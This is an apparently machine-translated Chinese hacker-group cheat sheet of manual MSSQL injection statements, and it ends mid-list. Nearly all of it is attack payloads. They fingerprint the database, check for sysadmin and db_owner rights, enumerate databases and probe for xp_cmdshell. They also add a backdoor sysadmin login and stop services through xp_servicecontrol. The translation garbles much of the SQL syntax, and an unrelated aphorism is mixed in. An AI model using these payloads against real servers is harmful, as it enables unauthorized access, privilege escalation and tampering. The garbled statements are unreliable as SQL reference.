手工MSSQL注入常用SQL语句文库（Manual MSSQL injection is used to inject common SQL statement libraries）.doc

手工MSSQL注入常用SQL语句文库（Manual MSSQL injection is used to inject common SQL statement libraries） Manual MSSQL injection is injected into the common SQL statement library. TXT if sincerity is a kind of injury, please choose a lie; If a lie is an injury, choose silence; If silence is an injury, choose to leave. Manual MSSQL injection is used in common SQL statements To be organized: huaxia black union -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - And exists (select * from sysobjects) / / determines if it is MSSQL And exists (select * from tableName) / / to determine whether a table exists.. TableName for the name of the table And 1 = (select @version) / / MSSQL VERSION And 1 = (select db_name ()) / / the current database name And 1 = (select @servername) / / local service name And 1 = (select IS_SRVROLEMEMBER ( sysadmin )) / / is it a system administrator And 1 = (Select IS_MEMBER ( db_owner )) / / determine if the library is authorized And 1 = (Select HAS_DBACCESS ( master )) / / determine if there is a library read permission And 1 = (select name from master. Dbo. sysdatabases where dbid = 1) / / the violent library name dbid is 1, 2, 3... ; Declare @d int / / if multiple rows are supported And 1 = (Select count (*) FROM master.db.sysobjects Where xtype = X and name = xp_cmdshell) / / determine if xp_cmdshell exists And 1 = (select count (*) FROM master.db.sysobjects where name = xp_regread) / / check whether the xp_regread extension stored procedure has been deleted Add and remove a user test for SA permission: (need SA permission) The exec master. The dbo. Sp_addlogin test, the password The exec master. The dbo. Sp_addsrvrolemember test, sysadmin Stop or activate a service. (need SA permission) The exec master.. Xp_servicecontrol stop, schedule The exec master.. Xp_servicecontrol start, schedule Site catalog Create table